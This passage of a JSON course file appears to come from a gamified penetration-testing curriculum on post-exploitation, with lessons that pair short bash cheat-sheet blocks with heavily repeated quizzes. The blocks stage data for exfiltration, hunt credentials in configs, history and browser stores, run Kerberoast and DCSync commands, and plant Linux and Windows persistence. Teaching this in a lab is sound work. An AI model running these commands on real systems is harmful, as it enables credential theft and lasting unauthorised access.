accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-data-staging","cat":"Post-Exploitation","title":"Data Staging and Compression","diff":2,"xp":150,"intro":"Prepare data for exfiltration.","sections":[{"type":"text","content":"Prepare data for exfiltration."},{"type":"code","lang":"bash","content":"# Compress for exfil\ntar czf /tmp/.data.tar.gz /home/user/documents/\n# Encrypt\nopenssl enc -aes-256-cbc -in data.tar.gz -out data.enc -k password\n# Split into chunks\nsplit -b 1M data.enc chunk_"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why compress before exfiltration?","opts":["It's required","Reduces transfer size and avoids large transfer detection","It encrypts data","It's faster to process"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-situational-awareness","cat":"Post-Exploitation","title":"Situational Awareness Commands","diff":1,"xp":75,"intro":"Understand the environment after landing on a target.","sections":[{"type":"text","content":"Understand the environment after landing on a target."},{"type":"code","lang":"bash","content":"# Linux\nid; hostname; ip addr; cat /etc/os-release; df -h; last -10\n# Windows\nwhoami /all; hostname; ipconfig /all; systeminfo; net user"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Why check hostname and IP first?","opts":["To benchmark speed","To understand where you are in the network","To find vulnerabilities","To crack passwords"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-credential-hunting","cat":"Post-Exploitation","title":"Credential Hunting","diff":2,"xp":150,"intro":"Find passwords and tokens across the system.","sections":[{"type":"text","content":"Find passwords and tokens across the system."},{"type":"code","lang":"bash","content":"# Config files\nfind / -name '*.conf' -exec grep -l password {} ; 2>/dev/null\n# History files\ncat ~/.bash_history | grep -iE 'pass|secret|mysql|ssh'\n# Environment\nenv | grep -iE 'pass|key|token|secret'\n# Browser\nfind / -name 'Login Data' -o -name 'logins.json' 2>/dev/null"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Credentials hide in...","opts":["Only /etc/shadow","Config files, history, env vars, browser storage, and more","Only memory","Only the registry"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-ad-attacks","cat":"Post-Exploitation","title":"AD Attack Cheat Sheet","diff":3,"xp":200,"intro":"Quick reference for common Active Directory attacks.","sections":[{"type":"text","content":"Quick reference for common Active Directory attacks."},{"type":"code","lang":"bash","content":"# Kerberoast\nimpacket-GetUserSPNs domain/user:pass -dc-ip DC -request\nhashcat -m 13100 hashes.txt rockyou.txt\n# AS-REP Roast\nimpacket-GetNPUsers domain/ -dc-ip DC -no-pass -usersfile users.txt\nhashcat -m 18200 hashes.txt rockyou.txt\n# DCSync\nimpacket-secretsdump domain/admin:pass@DC -just-dc"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DCSync requires...","opts":["Physical access","Replicating Directory Changes permissions","Network admin","DNS access"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-linux-persist","cat":"Post-Exploitation","title":"Linux Persistence Techniques","diff":2,"xp":150,"intro":"Survive reboots on Linux.","sections":[{"type":"text","content":"Survive reboots on Linux."},{"type":"code","lang":"bash","content":"# SSH key: echo 'ssh-rsa ...' >> ~/.ssh/authorized_keys\n# Cron: (crontab -l; echo '* * * * * /tmp/shell.sh') | crontab -\n# Service: create systemd unit\n# SUID: cp /bin/bash /tmp/.b && chmod +s /tmp/.b\n# .bashrc: echo '/tmp/shell.sh &' >> ~/.bashrc"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"SSH key persistence works because...","opts":["It's encrypted","Keys bypass password auth permanently","It modifies the kernel","It changes DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-windows-persist","cat":"Post-Exploitation","title":"Windows Persistence Techniques","diff":2,"xp":150,"intro":"Survive reboots on Windows.","sections":[{"type":"text","content":"Survive reboots on Windows."},{"type":"code","lang":"bash","content":"# Registry Run key\nreg add HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun /v svc /d C:payload.exe\n# Scheduled task\nschtasks /create /tn Update /tr C:payload.exe /sc onlogon /ru SYSTEM\n# Service\nsc create svc binPath= C:payload.exe start= auto"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Registry Run keys execute at...","opts":["Boot only","Every user login","Installation","Shutdown"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-impacket-suite","cat":"Post-Exploitation","title":"Impacket Tool Suite","diff":2,"xp":150,"intro":"Essential Windows pentesting toolkit from Linux.","sections":[{"type":"text","content":"Essential Windows pentesting toolkit from Linux."},{"type":"code","lang":"bash","content":"impacket-psexec admin@target -hashes :HASH\nimpacket-wmiexec admin@target\nimpacket-smbexec admin@target\nimpacket-secretsdump domain/admin:pass@DC\nimpacket-GetUserSPNs domain/user:pass -dc-ip DC -request"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"impacket-psexec creates a shell via...","opts":["SSH","SMB service creation","RDP","HTTP"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt 